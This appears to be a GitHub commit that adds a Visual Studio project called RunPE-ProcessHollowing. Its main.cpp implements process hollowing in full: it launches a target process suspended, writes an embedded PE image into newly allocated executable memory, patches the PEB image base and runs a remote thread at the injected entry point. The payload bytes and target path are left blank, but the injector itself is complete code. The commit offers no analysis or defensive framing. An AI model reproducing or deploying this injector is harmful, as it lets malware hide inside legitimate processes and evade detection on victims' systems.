Initial Commit

kernelm0de · Nov 4, 2017 · 5cc118b · 5cc118b
commit 5cc118b
Show file tree

Hide file tree

Showing 4 changed files with 275 additions and 0 deletions.
diff --git a/RunPE-ProcessHollowing.sln b/RunPE-ProcessHollowing.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RunPE-ProcessHollowing", "RunPE-ProcessHollowing.vcxproj", "{4767913E-4C89-4B90-9881-9F115CCB5F03}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Debug|x64.ActiveCfg = Debug|x64
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Debug|x64.Build.0 = Debug|x64
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Debug|x86.ActiveCfg = Debug|Win32
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Debug|x86.Build.0 = Debug|Win32
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Release|x64.ActiveCfg = Release|x64
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Release|x64.Build.0 = Release|x64
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Release|x86.ActiveCfg = Release|Win32
+		{4767913E-4C89-4B90-9881-9F115CCB5F03}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/RunPE-ProcessHollowing.vcxproj b/RunPE-ProcessHollowing.vcxproj
@@ -0,0 +1,157 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{4767913E-4C89-4B90-9881-9F115CCB5F03}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>RunPEProcessHollowing</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="main.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="main.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
diff --git a/main.cpp b/main.cpp
@@ -0,0 +1,79 @@
+#include <Windows.h>
+#include <strsafe.h>
+#include "main.h"
+
+#pragma comment(linker,"/ENTRY:mainCRTStartup")
+
+int main() {
+
+	//Pointers to Dos and Nt headers structs of data
+	PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)data;
+	PIMAGE_NT_HEADERS NtHeader = (PIMAGE_NT_HEADERS)(data + DosHeader->e_lfanew);
+
+	//Initialising parameters for CreateThread
+	LPWSTR AppPath = (LPWSTR)malloc(1024 * sizeof(char));
+	PPROCESS_INFORMATION ProcessInfo = (PPROCESS_INFORMATION)malloc(sizeof(PROCESS_INFORMATION));
+	STARTUPINFO StartInfo = { sizeof(StartInfo) };
+
+	ULONG BytesReturned;
+	PROCESS_BASIC_INFORMATION ProcBasicInfo;
+	void* NewImageBase;
+	DWORD PEBImageBase;
+
+	StringCchCopy(AppPath, 1024, L" "); // Executable To Inject Into (PATH)
+	HMODULE ntDll = LoadLibraryA("ntdll.dll");
+	NTQUERYINFOPROC NtQueryInfoProcess = (NTQUERYINFOPROC)GetProcAddress(ntDll, "NtQueryInformationProcess");
+
+	if (NtHeader->Signature != IMAGE_NT_SIGNATURE) {
+		return 1;
+	}
+
+	CreateProcess(AppPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &StartInfo, ProcessInfo);
+
+	NtQueryInfoProcess(
+		ProcessInfo->hProcess,
+		ProcessBasicInformation,
+		&ProcBasicInfo,
+		sizeof(PROCESS_BASIC_INFORMATION),
+		&BytesReturned);
+
+	NewImageBase = VirtualAllocEx(ProcessInfo->hProcess,
+		NULL,
+		NtHeader->OptionalHeader.SizeOfImage,
+		MEM_COMMIT | MEM_RESERVE,
+		PAGE_EXECUTE_READWRITE);
+
+	//Writing all the headers
+	WriteProcessMemory(ProcessInfo->hProcess, NewImageBase, data, NtHeader->OptionalHeader.SizeOfHeaders, 0);
+
+	//Writing Sections
+	PIMAGE_SECTION_HEADER SectionHeader = PIMAGE_SECTION_HEADER(DWORD(data) + DosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
+
+	for (int num = 0; num < NtHeader->FileHeader.NumberOfSections; num++)
+	{
+		WriteProcessMemory(ProcessInfo->hProcess,
+			(LPVOID)(DWORD(NewImageBase) + SectionHeader->VirtualAddress),
+			LPVOID(DWORD(data) + SectionHeader->PointerToRawData),
+			SectionHeader->SizeOfRawData,
+			0);
+		SectionHeader++;
+	}
+
+	//Address of 6th member of PEB aka BaseAddressofImage or refered in winternl.h as Reserved3[1]
+	PEBImageBase = (DWORD)ProcBasicInfo.PebBaseAddress + 0x08;
+	WriteProcessMemory(ProcessInfo->hProcess, (LPVOID)PEBImageBase, LPVOID(&NewImageBase), 4, 0);
+
+	HANDLE NewThread = CreateRemoteThread(ProcessInfo->hProcess,
+		NULL,
+		0,
+		(LPTHREAD_START_ROUTINE)((DWORD)(NewImageBase)+NtHeader->OptionalHeader.AddressOfEntryPoint),
+		NULL,
+		CREATE_SUSPENDED,
+		NULL);
+
+	ResumeThread(NewThread);
+	SuspendThread(ProcessInfo->hThread);
+
+	FreeLibrary(ntDll);
+	return 0;
+}
diff --git a/main.h b/main.h
@@ -0,0 +1,11 @@
+#include <winternl.h>
+
+typedef NTSTATUS(WINAPI *NTQUERYINFOPROC)(
+	HANDLE           ProcessHandle,
+	PROCESSINFOCLASS ProcessInformationClass,
+	PVOID            ProcessInformation,
+	ULONG            ProcessInformationLength,
+	PULONG           ReturnLength
+	);
+
+unsigned char data[123] = {}; // Bytes to Inject